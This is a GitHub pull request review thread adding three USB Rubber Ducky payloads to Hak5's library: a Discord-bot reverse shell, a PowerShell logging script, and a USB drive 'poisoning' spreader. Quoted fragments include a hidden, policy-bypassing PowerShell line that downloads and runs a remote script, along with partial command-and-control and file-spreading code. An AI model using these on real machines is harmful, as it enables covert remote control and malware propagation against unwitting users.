beigeworm's first hak5 payload submission!
hak5/usbrubberducky-payloads pull request #504
Opened 2024-12-05 12:17 UTC by beigeworm

I have added 3 payloads to [usbrubberducky-payloads](https://github.com/hak5/usbrubberducky-payloads) :

**Payloads**
- Discord-CLI : Gain a reverse shell on a target Windows PC using Discord's bot API as a command and control server.
- Global-Powershell-Logging : Log all powershell input and output to a text file in `Documents/WindowsPowershell` folder.
- USB-Poison : Copy a file or payload to any newly connected USB drives.

**Requirements**
- Discord-CLI : A Discord bot/app token, A discord server and channel setup.
- Global-Powershell-Logging : Administrator permissions are required for this script.
- USB-Poison : A specified file to copy.

*All payloads are tested and working on both Windows 10 and 11 (pro editions)*

2024-12-06 01:57 UTC, hak5peaks requested changes

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/general/USB-Poison/USB-Poison.txt
> +DEFINE FILEPATH path/to/your/file.exe
Similar too your other payload. You need to modify this and add a `#` to the `DEFINE` 

```
DEFINE #FILEPATH path/to/your/file.exe
```

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/general/USB-Poison/USB-Poison.txt
> +STRINGLN $file="FILEPATH";while($true){$initialDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID;while($true){$currentDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.Dr
As stated in other comment, please add a `#` before `FILEPATH`

```
STRINGLN $file="#FILEPATH"
```

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/general/USB-Poison/USB-Poison-Hidden.txt
> +REM Target:      Windows 10/11
Consider using `EXTENSION PASSIVE_WINDOWS_DETECT` the extension allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay. Also allows you to add a guard statement to ensure the target is windows 

for example 

```                                                                                                                                                   
IF ($_OS != WINDOWS)                                                                                                                 
    LED_R                                                                                                                                       
    STOP_PAYLOAD 
END_IF
```

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/incident_response/Global-Powershell-Logging/Payload.txt
> +REM Target:      Windows 10/11
Consider using `EXTENSION PASSIVE_WINDOWS_DETECT` the extension allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay. Also allows you to add a guard statement to ensure the target is windows 

for example 

```                                                                                                                                                   
IF ($_OS != WINDOWS)                                                                                                                 
    LED_R                                                                                                                                       
    STOP_PAYLOAD 
END_IF
```

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/incident_response/Global-Powershell-Logging/Payload.txt
> +STRING powershell -Ep Bypass -W H -C IRM https://yourserver.com/rawfile/Global-Powershell-Logging.ps1 | iex
Please use a `DEFINE` for server link. This makes configuration easier for the user and makes the script more readable. 

```
DEFINE #SERVERURL  https://example.com/

STRING powershell -Ep Bypass -W H -C IRM #SERVERURL | iex
```

I would also specify inside of your reamde.md that is payload downloading the ps1 file from a server and also explain that the user will need to host the file on their server

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt
> +DEFINE TOKEN your-bot-token-here
Similar you to your other payloads, you need to you a `#` to your defines and calls

```
DEFINE #TOKEN your-bot-token-here
DEFINE #CHANNEL your-channel-id-here

STRINGLN $t = "#TOKEN";$c = "#CHANNEL"
```

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt
> +REM Target:      Windows 10/11
Consider using `EXTENSION PASSIVE_WINDOWS_DETECT` the extension allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay. Also allows you to add a guard statement to ensure the target is windows 

for example 

```                                                                                                                                                   
IF ($_OS != WINDOWS)                                                                                                                 
    LED_R                                                                                                                                       
    STOP_PAYLOAD 
END_IF
```

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt
> +STRINGLN $t = "TOKEN";$c = "CHANNEL";$a='[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);';$t=Add-Type -M $a -name Win32ShowWindowAsync -names Win32Func
As mentioned above, add a `#` to your definition calls 

```
STRINGLN $t = "#TOKEN";$c = "#CHANNEL"
```

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/remote_access/Discord-CLI/Discord-CLI.txt
> +DEFINE TOKEN your-bot-token-here
Similar you to your other payloads, you need to you a `#` to your defines and calls

```
DEFINE #TOKEN your-bot-token-here
DEFINE #CHANNEL your-channel-id-here

STRINGLN $t = "#TOKEN";$c = "#CHANNEL"
```

2024-12-06 01:57 UTC, hak5peaks commented on payloads/library/remote_access/Discord-CLI/Discord-CLI.txt
> +STRINGLN $t = "TOKEN";$c = "CHANNEL";function sndmsg{$w.Headers.Add("Content-Type", "application/json");$j = @{"content" = "``````$($b -join "`n")``````"} | ConvertTo-Json;$x = $w.UploadString($u, "P
As mentioned above, add a `#` to your definition calls 

```
STRINGLN $t = "#TOKEN";$c = "#CHANNEL"
```

2024-12-07 11:41 UTC, beigeworm commented on payloads/library/general/USB-Poison/USB-Poison-Hidden.txt
> +DEFINE FILEPATH path/to/your/file.exe
Thanks peaks I have made the requested amendments :)

2024-12-07 11:41 UTC, beigeworm commented on payloads/library/general/USB-Poison/USB-Poison-Hidden.txt
> +STRINGLN $file="FILEPATH";$a='[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);';$t=Add-Type -M $a -name Win32ShowWindowAsync -names Win32Functions -pas;
Thanks peaks I have made the requested amendments :)

2024-12-07 11:41 UTC, beigeworm commented on payloads/library/general/USB-Poison/USB-Poison.txt
> +DEFINE FILEPATH path/to/your/file.exe
Thanks peaks I have made the requested amendments :)

2024-12-07 11:41 UTC, beigeworm commented on payloads/library/general/USB-Poison/USB-Poison.txt
> +STRINGLN $file="FILEPATH";while($true){$initialDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID;while($true){$currentDrives=Get-WMIObject Win32_LogicalDisk | ? {$_.Dr
Thanks peaks I have made the requested amendments :)

2024-12-07 11:42 UTC, beigeworm commented on payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt
> +DEFINE TOKEN your-bot-token-here
Thanks peaks I have made the requested amendments :)

2024-12-07 11:42 UTC, beigeworm commented on payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt
> +REM Target:      Windows 10/11
Thanks peaks I have made the requested amendments :)

2024-12-07 11:42 UTC, beigeworm commented on payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt
> +REM Target:      Windows 10/11
Thanks peaks I have made the requested amendments :)

2024-12-07 11:42 UTC, beigeworm commented on payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt
> +STRINGLN $t = "TOKEN";$c = "CHANNEL";$a='[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);';$t=Add-Type -M $a -name Win32ShowWindowAsync -names Win32Func
Thanks peaks I have made the requested amendments :)

2024-12-07 11:42 UTC, beigeworm commented on payloads/library/remote_access/Discord-CLI/Discord-CLI.txt
> +DEFINE TOKEN your-bot-token-here
Thanks peaks I have made the requested amendments :)

2024-12-07 11:42 UTC, beigeworm commented on payloads/library/remote_access/Discord-CLI/Discord-CLI.txt
> +STRINGLN $t = "TOKEN";$c = "CHANNEL";function sndmsg{$w.Headers.Add("Content-Type", "application/json");$j = @{"content" = "``````$($b -join "`n")``````"} | ConvertTo-Json;$x = $w.UploadString($u, "P
Thanks peaks I have made the requested amendments :)

2024-12-07 11:43 UTC, beigeworm commented on payloads/library/incident_response/Global-Powershell-Logging/Payload.txt
> +REM Target:      Windows 10/11
Thanks peaks I have made the requested amendments :)

2024-12-07 11:44 UTC, beigeworm commented on payloads/library/incident_response/Global-Powershell-Logging/Payload.txt
> +STRING powershell -Ep Bypass -W H -C IRM https://yourserver.com/rawfile/Global-Powershell-Logging.ps1 | iex
Thanks peaks I have made the requested amendments :)

2024-12-07 11:46 UTC, beigeworm commented
Hoping all changes meet the requirements - Thanks!

2024-12-10 15:47 UTC, hak5peaks requested changes

2024-12-10 18:50 UTC, beigeworm commented on payloads/library/incident_response/Global-Powershell-Logging/README.md
All done! :)

2024-12-12 11:55 UTC, merged